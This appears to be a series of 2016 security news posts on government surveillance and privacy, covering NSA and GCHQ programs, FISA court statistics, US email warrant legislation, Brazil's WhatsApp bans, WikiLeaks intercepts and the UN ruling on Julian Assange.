If you believe that the Snowden‘s revelations have stopped or limited the surveillance activities you are obviously wrong. The diffusion of the technology and the increasing threats of espionage and terrorism is approached by the intelligence with a significant intensification of monitoring activities.

According to 2015 transparency report regarding the use of National Security Authorities, the US intelligence has ramped up searches of US citizens’ data.

The US intelligence agencies access information stored in a database that is fed with the data gathered by the surveillance machine managed by the NSA. Edward Snowden has leaked online documents related to powerful surveillance platforms like the XKeyScore that is considered the “widest-reaching” architecture for developing intelligence from the internet.

Going deep in the report is it possible to discover that the number of surveillance queries concerning known US citizens is 4,672, almost double respect the same number declare in the 2013 transparent report.

The above number related to the surveillance queries include the requests made by Intelligence Agencies, like the NSA and CIA, but doesn’t include the FBI that has no access to the database.

2015 intelligence transparency report

The intelligence transparency report also refers more than 48,000 targets of National Security Letters, a National Security Letters (NSL) is defined as “a request for information that the Federal Bureau of Investigation (FBI) can make when they or other agencies in the Executive Branch of the U.S. government are conducting national security investigations. An NSL can’t be used in ordinary criminal, civil or administrative matters.”

The agencies query the database without a warrant as specified in section 702 of FISA ( “Procedures for Targeting Certain Persons Outside the United States Other Than United States Persons”).

The section highlights that “The government may not target any U.S. person anywhere in the world under this authority, nor may it target a person outside of the U.S. if the purpose is to acquire information from a particular, known person inside the U.S.”

“Section 702 only permits the targeting of non-U.S. persons reasonably believed to be located outside the United States to acquire foreign intelligence information. Such targets, however, may on occasion communicate information of or about U.S. persons. Where appropriate, NSA may disseminate such information concerning U.S. persons. ” clarifies the report.

The 4,672 cases cited in the transparency report demonstrate that the US intelligence has gathered and accessed data of US citizens without any warrant. You have also to consider that the NSA and the CIA theoretically don’t cover internal surveillance activities.

The report also identifies more than 48,000 targets of National Security Letters, a common business request that has also been criticized as unconstitutional.


Email Privacy Act – United States House Unanimously Passes Bill Demanding Warrants For e-mail, Cloud-based Data
3.5.2016 BigBrothers

Email Privacy act – House of Representatives sanctioned a bill that demands authorities must obtain a court warrant before they could obtain email records.
The United States House of Representatives on April 27, 2016, unanimously sanctioned a bill which demands that U.S. authorities must obtain a court warrant before they could obtain e-mail records and data stored in cloud-based platforms.

Email Privacy Act House of Representatives

By this move, the Email Privacy Act effectively relaxes a subsisting law during the presidency of President Ronald Reagan that permits authorities to access e-mail records and data from service providers without a search warrant as long as the message or data is at least 180 days (six months) old. The 1986 e-mail privacy law, espoused when CompuServe held sway, regarded cloud-stored e-mail and other documents older than six months to be derelict and suitable to be acquired without a warrant.

Having been passed by the House, this new bill now proceeds to the Senate, where its likelihood of passage is somewhat uncertain. Recall that the U.S. Senate Judiciary Committee has for years deliberated and passed similar legislation which never saw the light of the day. As usual, for this bill to become a law, President Barack Obama must append his signature. However, given that Mr. Obama leaves office in January, 2017, it’s doubtful he can sign the bill before his presidency runs out.

The aforementioned bill approved on Wednesday was said to have been co-sponsored by more than 300 Representatives across the political parties. A proviso requiring that the target of the warrant be notified about the warrant was expunged from the bill. The likes of Google and many other corporations already demand one because of changing guide as to whether a warrant is required or not.

Just as warrants are needed for physical papers and properties, the bill also stipulates that warrants are needed for all online documents and other private electronic documents, pictures. However, National Security Letters, which have seen hundreds of thousands issued so far, are exempted in the Bill passed by the House.

United States government establishments such as the Securities and Exchange Commission (SEC) vigorously buttonholed against the measure, preferring it to be removed from the law. The SEC argued this stipulation would make its job of monitoring securities fraud very challenging. However, the House version did not succumb to the takes of the SEC.

Privacy campaigners are said to be guardedly enthusiastic about the measure’s passage in the House of Representatives.

Sophia Pope, a staff attorney with advocacy group – the Electronic Frontier Foundation (EFF) said, “while we applaud the passage of H.R. 699, the bill isn’t perfect. In particular, the Email Privacy Act doesn’t require the government to notify users when it seeks their online data from service providers, a vital safeguard ensuring users can obtain legal counsel to fight for their rights,”. She went further to say, “however, companies may continue to provide notice to users of government requests—prior to compliance—something many companies commit to in our annual Who Has Your Back report.”

In conclusion, corporations such as Amazon and Yahoo amongst others supported the measure despite it not achieving “all of the reforms they anticipated.”


WhatsApp blocked for more than 100 million users due to a Judge’s order
3.5.2016 BigBrothers

A Brazilian judge ordered to block access to the WhatsApp messaging service for 72 hours, it is the second time in five months.
Brazilian authorities ordered ISPs to block WhatsApp today in a dispute over access to encrypted data. The order to block the messaging service for 72 hours has been issued by a judge from the Brazilian state of Sergipe, the ISPs are obliged to comply the order to avoiding face fines.

According to the Brazilian newspaper Folha de S.Paulo the ban would begin at 2 p.m. local time and will impact more than 100 million Brazilian users.

The Judge Marcel Montalvao was conducting a drug investigation, for this reason, he requested WhatsApp to provide the access to its data.

“After cooperating to the full extent of our ability with the local courts, we are disappointed a judge in Sergipe decided yet again to order the block of WhatsApp in Brazil,” a WhatsApp spokesperson told TechCrunch. “This decision punishes more than 100 million Brazilians who rely on our service to communicate, run their businesses, and more, in order to force us to turn over information we repeatedly said we don’t have.”

The company refused, arguing it cannot access the chat messages due to the implementation of the end-to-end encryption.

WhatsApp end-to-end encryption

WhatsApp confirmed its position on the case in a message published by its CEO Jan Koum.

“Yet again millions of innocent Brazilians are being punished because a court wants WhatsApp to turn over information we repeatedly said we don’t have. Not only do we encrypt messages end-to-end on WhatsApp to keep people’s information safe and secure, we also don’t keep your chat history on our servers.” explained the CEO Jan Koum. “When you send an end-to-end encrypted message, no one else can read it – not even us. While we are working to get WhatsApp back up and running as soon as possible, we have no intention of compromising the security of our billion users around the world.”
He is the same judge that ordered the arrest of the Facebook’s vice president for Latin America, in March, but its advocates clarified that WhatsApp has its own independent decisions and that Dzodan was not able to force it complying the request.

This is the second time that the WhatsApp service is banned in the country, it already happened in December 2015 when the block was planned for 48 hours and suspended after 12 hours.

How to avoid the ban?

Brazilian users would use VPN services in order to bypass the ban, and it is what is already happening in the country.


Brazil blocks WhatsApp for 72-Hours — Here's Why
3.5.2016 BigBrothers

For the second time in past five months, a Brazil court ordered local telecommunications companies to block the popular messaging app WhatsApp for 72 hours, afterFacebook-owned WhatsApp company refused to hand over information requested in a drug trafficking investigation. The WhatsApp's shutdown is affecting more than 100 million users throughout the country. Moreover, if Brazilian telecommunications companies do not comply, they could face a fine of $143,000 per day.
Brazil just blocked its roughly 100 Million citizens from using WhatsApp, the popular messaging service owned by Facebook, for 72 hours (3 days).
A Brazilian Judge ordered the blackout after WhatsApp failed to comply with a court order asking the company to help a branch of civil police access WhatsApp data tied to a criminal investigation.
This is for the second time in last five months when a Brazil court ordered local telecommunications companies to block access to the popular messaging service across the country.
The ruling came into effect at 2 p.m. local time (1 p.m. ET), after which an estimated 91 percent of Brazilian mobile users nationwide could not be able to send or receive any messages on WhatsApp, Local newspaper Folha de S.Paulo reported.
How to access WhatsApp in Brazil? Use Orbot app from Tor project.
Penalty of $142,000/Day for Not Complying
Moreover, if any service provider found violating the court order, it would subject to a penalty of $142,000 per day.
WhatsApp is very disappointed by the move, saying the decision "punishes more than 100 million users who depend upon us [WhatsApp] to communicate themselves, run their business and more, just to force us to hand over information that we do not have."
WhatsApp recently enabled complete End-to-End encryption for its text, image and voice messages, which means that even the company would not be able to access any message exchanged between users. This made matter even worse for the Brazilian police.
In December, a São Paulo state judge ordered the shutdown of WhatsApp across the country for 48 hours after Facebook failed to comply with a criminal investigation, although the court ruling was overturned by another court the next day.
The blackout comes courtesy of Judge Marcel Maia Montalvão of Sergipe state, the same judge who in March ordered the imprisonment of a Facebook executive for not turning over private data from a WhatsApp account tied to a drug trafficking investigation. He was jailed and subsequently released the next day.


FISA Court approved each and every request made by the government in 2015
2.5.2016 BigBrothers

According to a Justice Department memo, the FISA ACT Court approved each and every request made by the government in 2015.
According to a Justice Department memo, the United States Foreign Intelligence Surveillance Act (FISA) Court approved each and every request made by the government in 2015. All of the 1,457 requests made last year by the NSA and FBI were approved. This was the case in 2014, as well. All 1,379 requests submitted were approved by the court. There was, however, a significant increase in requests that were modified by the court before they were approved: 80 applications were revised in 2015, as opposed to 19 in 2014.

Additionally, according to the report, the FBI sent out 48,642 national security letters (NSL) in 2015. NSLs are demands for information which include gag orders forbidding the recipient from disclosing the request.

The FISA Court is responsible for approving or denying electronic spying requests for use in foreign intelligence activities. It should be noted that the role of the court is to provide oversight–not to working in concert with the government.

Similarly, during the second half of 2015, government requests for Facebook to spy on its users increased 13% to 46,763. This is according to Facebook’s bi-annual transparency report. Included in the requests were personal data and messaging content from Messenger, WhatsApp, and Instagram.

FISA court 2015

Sixty percent of those requests for access to the data of Facebook users in the U.S. came with a non-disclosure order preventing Facebook from alerting the user to the fact that their personal data had been accessed and their communications were being monitored.

To make matters worse, the Department of Justice (DOJ) is one step closer to being authorized to remotely access computers anywhere in the world. According to TechDirt:

“The proposed amendments to Rule 41 remove jurisdiction limitations, which would allow the FBI to obtain a search warrant in, say, Virginia, and use it to ‘search’ computers across the nation using Network Investigative Techniques (NITs).

The DOJ claims the updates are needed because suspects routinely anonymize their connections, making it difficult to determine where they’re actually located. Opponents of the changes point out that this significantly broadens the power of magistrate judges, who would now be able to approve search warrants targeting any computer anywhere in the world.”

There has been no congressional opposition to the proposed amendments, with the exception of Sen. Ron Wyden (D-OR).

Meanwhile, National Intelligence chief James Clapper has been attempting to reverse all the progress made over the past couple years with encrypted communications. Clapper recently referred to encryption as “not a good thing.”

The encrypted communications market emerged in reaction to the government’s overzealous efforts to sidestep the 4th Amendment. The government inadvertently created what it is now trying to destroy.


The British GCHQ has disclosed dozens vulnerabilities this year

1.5.2016 BigBrothers

The CESG is considered the Information Security Arm of GCHQ, it has disclosed more than 20 vulnerabilities affecting multiple software this year.
The British intelligence agency GCHQ has disclosed more than 20 vulnerabilities affecting multiple software. The information was shared by a GCHQ spokesperson with the Motherboard.

The flaws were discovered by the CESG (Communications-Electronics Security Group), which is considered the Information Security Arm of GCHQ.

“So far in 2016 GCHQ/CESG has disclosed more than 20 vulnerabilities across a number of software products,” is the statement released by the GCHQ spokesperson to Motherboard.

Among the vulnerabilities disclosed by the CESG this year, there is also a serious flaw in the Firefox Browser version 46, a kernel vulnerability in OS X El Captain v10.11.4, a couple of vulnerabilities in Squid, and two bugs in the iOS 9.3.

GCHQ

Some of the bugs allow attackers to execute arbitrary code on the vulnerable devices.

“We are not always credited by vendors for bugs that we disclose. We ask companies for credit in bulletins that they may publish, but recognise that this is not always possible,” said a GCHQ spokesperson.

The disclosure of security flaws affecting products on the market is unusual when dealing with intelligence agencies and law enforcement that use to exploit them for their hacking operations.

In August 2014, the BBC reported that the executive director of the Tor Project revealed that both US and UK intelligence agencies share bugs anonymously with Tor developers.

The information disclosed by Andrew Leman, in an interview with BBC confirm the existence of groups of experts inside the organizations that anonymously leak information about Tor vulnerabilities in order for the bugs to get patched.

“There’s a lot of groundswell of support as to what is going on, but at the same time there’s the other half of the organization that is: ‘You know what? People shouldn’t have privacy,’ and ‘Let’s go out and attack these things,’”“So there is always a balance between those who protect our freedom and liberty and those who don’t want you to have it.” Lewman said.

Lewman confirmed that agency insiders ordinary used Tor’s mechanism for anonymous bug submissions which doesn’t request any information to the researchers which provide information on bugs in the Tor network.

“There are plenty of people in both organizations who can anonymously leak data to us to say maybe you should look here, maybe you should look at this to fix this,” “And they have. Lewmansaid.


Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers

The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents that reveals the NSA targeted world leaders for US Geopolitical Interests.

Some of the intercepts are classified TOP-SECRET COMINT-GAMMA, these are most highly classified documents ever published by a media organization.

In particular, one of the documents, reports eavesdropping activities conducted by the US intelligence that spied on the communication between the German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon on climate change negotiations.

The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber the spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:

“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”

wikileaks NSA
The new lot of classified documents also revealed that espionage on the Chief of Staff of UN High Commissioner for Refugees (UNHCR), an activity that was conducted by the US intelligence for a for a long time, the spies intercepted targeting his Swiss phone.

Under the control of the US intelligence there was also the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but most interesting cables for the Italian Government are related the espionage of the Prime Minister Silvio Berlusconi.

The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan.

” reported an article published by the Italian L’Espresso.

The documents leaked by Wikileaks confirmed that in March 2010 the US Government has intercepted communications between Italian Prime Minister and the Israeli PM Netanyahu, information disclosed reveals that Berlusconi promised to assist in helping Israel in mending the damaged relationship with the U.S..

The crisis between the United States and Israel was triggered by the announcement of Netanyahu’s plans to build 1,600 houses in East Jerusalem. Berlusconi offered its support to Israel in helping mend the situation.

According to these documents leaked by Assange’s organization, the NSA targeted targeted all the members of the Silvio Berlusconi’s staff, including his personal advisor Valentino Valentini, Berlusconi’s National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to the NATO, Stefano Stefanini.

In October 2011, the NSA also intercepted a Valentino Valentini’s top-secret/Noforn document.

Documents confirms the US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy defined the situation of the Italian banking system as ready to “pop like a cork.”

Which is the position of the Italian Government?

Many Italian security experts are not surprised by these revelations, myself included, from the institutional perspective, it seems that the current Italian Government is ignoring the serious facts.

“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised». continues the Expresso.

The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.

The document disclosed by Wikileaks also revealed other operations conducted by the US Intelligence, including the interception of the top EU and Japanese trade ministers.

“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.


GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers

A new documentary titled Zero Days revealed that the Stuxnet cyber weapon was just a small part of a much bigger Information Warfare operation (code named “NITRO ZEUS”) against the Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news on the Stuxnet worm, the first malware recognized by security industry as a cyber weapon. The documentary sheds light on the US war program that included the design of Stuxnet, it also reveals that hundreds of thousands of network implants and backdoors in Iran networks were managed by Western entities to penetrate Iranian infrastructure and destroy them.

Zero Days presented at the Berlin Film Festival confirms that Stuxnet was developed under the Information warfare operation called “Olympic Games,” which is part of a wider programme dubbed “Nitro Zeus” that involves hundreds of US cyber security experts. The US was not alone, the Israeli Government has a primary role in the Nitro Zeus program.

The documentary confirms that the nation-state hackers behind Stuxnet spent a significant effort in the attempting to covert their operation, they also designed the threat by restricting its operation only against Iranian machines.

Natanz-SCADA Stuxnet

One of the most intriguing novelties proposed in the documentary is the involvement of the GCHQ intelligence, the film sustains that the British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.

The experts at the NSA have hardly worked to cover the tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet developed by the Israeli force that went out of control infecting thousands of computers across more than 115 countries.

It is not clear is the GCHQ was informed about the Nitro Zeus program.


NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, the fictional malevolent artificial intelligence in the Terminator movies, run by the US National Security Agency (NSA) is a surveillance program that uses cell phone metadata to track the GPS location and call activities of suspected terrorists, who may be shot by a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA staffer Edward Snowden suggests that many of those people killed based on metadata may have been innocent.
Last year, the leaked documents detailing the NSA's SKYNET programme published by The Intercept showed that NSA had used a machine learning algorithm on the cellular network metadata of 55 Million people in Pakistan to rate each citizen's likelihood of being a terrorist.
You need to know that the US drone bombing campaigns in Pakistan have been raging for years.
Elementary Errors in SKYNET
However, the spy agency has made elementary errors in their machine-learning algorithm, which lead to the generation of thousands of false leads, potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET has a false-positive rate of 0.008%, in some cases, and the NSA was using about 55 million people’s phone records for SKYNET.
But, Ars Technica points out that, even at this minute rate, many innocent people are possibly mislabeled. Some of the NSA's tests even saw higher error rates of 0.18%, which means mislabeling nearly 99,000 people out of the 55 Million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
The purpose SKYNET serves is not clear yet. Although SKYNET could be part of non-violent surveillance programs, like tracking and monitoring suspected terrorists, Ars suggests this technology could potentially be used to target drone strikes.
US Drone Strike Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan and killed somewhere between 2,500 and 4,000 people, the Bureau of Investigative Journalism reported.
The NSA has not yet commented on how the agency used SKYNET, and how the technology was trained.
But Does Killing people "Based on Metadata" actually make sense?
Maybe it is easy to say YES, it makes sense as it happened or is happening far away in a foreign land. But imagine if SKYNET gets turned on us.


The IPT ruled that GCHQ spies can legally hack any electronic devices
15.2.2016 BigBrothers

The British Intelligence Agency GCHQ has a license to hack computers and devices, the UK’s Investigatory Powers Tribunal (IPT) ruled.
This means that the UK Government is giving full power to its intelligence agency to spy on Britons as well as people living abroad.

The verdict was issued on Friday after Privacy International and seven ISPs launched a legal challenge against the conduct of the CGHQ whom hacking operations were revealed by documents leaked by NSA whistleblower Edward Snowden.

The CGHQ is responsible of “persistent” illegal hacking of electronic devices and networks worldwide, the Investigatory Powers Tribunal (IPT) has been told.

The popular whistleblower Edward Snowden disclosed a collection of documents revealing the extent of surveillance programmes carried out by the Five Eyes alliance. Snowden revealed the existence of secret surveillance activities such as the Tempora operation and hacking platforms such as the Smurf suite.

GCHQ
GCHQ admitted for the first time that government monitoring station in Cheltenham carries out “persistent” and “non-persistent” Computer Network Exploitation (CNE) against targets in the UK and abroad.
In 2013, the tribunal was told, 20% of GCHQ’s intelligence reports contained information that was obtained through hacking operations.

The case has been brought in hearing at the IPT which deals with complaints against the surveillance operated by the UK intelligence. A four-day hearing is at the Rolls Building in central London.

“The [legal] regime governing CNE … remains disproportionate,” Ben Jaffey, counsel for Privacy International, told the tribunal. “Given the high potential level of intrusiveness, including over large numbers of innocent persons, there are inadequate safeguards and limitations.”

Jaffey highlighted that GCHQ’s hacking alter the targeted systems, an activity that is not considered legal by the authorities.

“The use of computer network exploitation by GCHQ, now avowed, has obviously raised a number of serious questions, which we have done our best to resolve in this Judgment,” reads the lengthy ruling from the Investigatory Powers Tribunal (IPT).

“Plainly it again emphasises the requirement for a balance to be drawn between the urgent need of the Intelligence Agencies to safeguard the public and the protection of an individual’s privacy and/or freedom of expression.”

The court has investigated the legality of the methods used by British intelligence

The tribunal investigated “investigates and determines complaints of unlawful use of covert techniques by public authorities infringing our right to privacy.”

In some cases, the GCHQ installed malware on targeted systems and hacked mobile devices with its Smurf suite.

In November 2015, for the first time the technological abilities of the UK’s National Crime Agency (NCA) have been revealed in a collection of documents, the British law enforcement agency has “equipment Interference” (EI) capabilities, which allow it to hack into mobile devices and computers.

Eric King, the deputy director of the Privacy International, who analyzed the document noticed that in a section there is the explicit reference to the capability of the UK law enforcement having the capability to conduct “equipment interference.”

“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”

UK law enforcement already in hacking business according to IPBill. pic.twitter.com/SAGzw2w4Fh
— Eric King (@e3i5) 4 Novembre 2015

The GCHQ hacking operations were conducted under a self-imposed code of conduct, the IPT recognizes as legal these activities despite the chagrin of privacy advocates.

“We are disappointed that the IPT has not upheld our complaint and we will be challenging its findings,” said Scarlet Kim, legal officer at Privacy International.

I wonder at this point what will be the repercussions of such a decision on the international level. This decision authorizes in fact any government to hack systems of foreign states. We are in the far west.


How to Crack GCHQ Crypto Puzzle? — Here's the Solution
9.2.2016 BigBrothers
GCHQ has finally released the solution to their head spinning Xmas Puzzle, after all, the participants failed to reach the final answer.
GCHQ had released a crypto puzzle, dubbed Xmas Puzzle, on 9th December in the form of a Christmas Card that went viral online soon after its release.
Nearly 600,000 people shot a "Go" for the challenge since early December, but only 30,000 had made it reach the final stage.
The puzzle got popped up with a grid-shading Nonogram that resulted in the formation of a QR Code containing a hint to unlock the next level challenges.
Xmas Puzzle prolonged to various topics like Web Link Maze, Word & Numeric Puzzle, Graph Theory and other Cipher Dilemmas. Some of the questions also intrigued on entertaining topics like Lord of the Rings, Ducks, Chess, French, and Semaphores.
Who Created Crypto ‘Xmas Puzzle’?
This brainstorming puzzle was created by a small team of GCHQ Cryptographers under the GCHQ director Robert Hannigan. The given deadline to the puzzle resolvers was January 31st.
Several improvements to resolve this puzzle had created a buzz over various online forums like Reddit, which was a healthy approach to such puzzles to get solved jointly.
Xmas Puzzle helped to broaden the crypto levels of each and bolster to improve their capabilities for the problem-solving methodologies.
David MacBryan, 41, from Edinburgh, Wim Hulpia, 40, from Lovendegem in Belgium and US-born Kelley Kirklin, 54, from London, came closest to the fiendish puzzle game.
These three participants have been considered winners by the GCHQ and will be rewarded with a GCHQ Paperweight and a copy of Bletchley Park codebreaker Alan Turing's biography, signed with a personal message from GCHQ Director.
Unable to Crack? Here’s the Solution
gchq-crypto-quiz
However, GCHQ announced that any of the participants did not completely solve Xmas Puzzle. Hence, it released the full answer to it.
"I thought I had solved it, but a news report came out a few days ago saying nobody had … so I went back and had another look and figured out what I missed, but I was too late at that point. But it seems that everyone else missed it as well, and I was joint closest," David MacBryan told the Guardian.
GCHQ said the Xmas puzzle was not a recruitment ploy, which was initially believed, but the agency said the winners were welcome to apply for jobs.
The solution to the puzzle, including explanations from the puzzle-setters, is now available for you, so you can now check how many you managed to work out.


United Nations Rules in Favor of WikiLeaks Founder Julian Assange
5.2.2016  BigBrothers
VICTORY!
As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.
However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.
Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.
But, Victory! The decision is in favor of Assange.
The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.
Julian Assange should be released immediately and allowed to leave the embassy as well as both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.
"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.
But, Will UK and Sweden Let Assange Leave the country?
Despite the decision is in favor of Assange, there could be a possibility that both the countries’ governments will not let Assange leave the country.
The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.
The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."
Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.
To make this sure, the Met Police, meanwhile, said it will make "every effort" to arrest Assange should he leave the embassy.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, to avoid extradition to:
Sweden where he is facing sexual assault allegations, which he has always denied.
The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.
Assange's Lawyer: Sweden and UK should Respect UN’s Decision
Melinda Taylor, Assange's lawyer, says that if there is a positive ruling for Assange by UN group, Swedish and British government should respect their international obligations and comply with the decision, thereby allowing him to leave freely.
"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek reporter.
If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.
Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, helping governments to release people.
Similar rulings from the UN panel have resulted in the release of:
Washington Post journalist Jason Rezaian, who was released in Iran last month.
Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.
Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges, however, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.


On Friday, United Nation can decide that Assange is being illegally detained
3.2.2016  BigBrothers

On Friday the United Nation can decide that Assange is being illegally detained, in this case the UK and Sweden must immediately release him.
The United Nations will reveal very soon the results of its investigation on the case of Julian Assange, the Wikileaks founder. WikiLeaks published secret information and classified media from anonymous sources. Wikileaks already published more than 10 million documents, Assange described its platform as “a giant library of the world’s most persecuted documents”

The decision is set to be announced next Friday 4 February, when the US would order the release of Assange.
Julian Paul Assange is an Australian journalist that founded Wikileaks in 2006, he is currently residing in the Ecuador embassy in London, after having been granted political asylum in August 2012.
Many ignore that Assange has a past as a hacker, in 1987 under the pseudonym Mendax he hacked many organizations with two colleagues known as “Trax” and “Prime Suspect.”

The list of victims is long and includes the Pentagon, the U.S. Navy, NASA, and Australia’s Overseas Telecommunications Commission; Citibank, Lockheed Martin, Motorola, Panasonic, and Xerox.

In 1996, he pleaded guilty to twenty-five charges and was ordered to pay reparations of A$2,100 and released on a good behavior bond.

Assange has been residing in the embassy since 2012 to avoid extradition, the popular journalist is facing sexual assault allegations in Sweden, meanwhile, the United States ask him to respond the accusation of cyber espionage for publishing classified US military and diplomat documents.

On September 2014, Julian Assange filed a complaint against Sweden and the United Kingdom, that has been considered by the UN Working Group on Arbitrary Detention.

We have to sit and wait for the decision on the Assanges’ case. If the and if the group will decide that the man is being illegally detained, the UN is expected to call on the UK and Sweden to release him.

“IF THE WGAD FINDS IN FAVOUR OF JULIAN ASSANGE — WHAT HAPPENS NEXT?

If the WGAD finds in Julian Assange’s favour, it will declare that Julian Assange is arbitrarily detained. In this case the UK and Sweden must immediately release and compensate him.”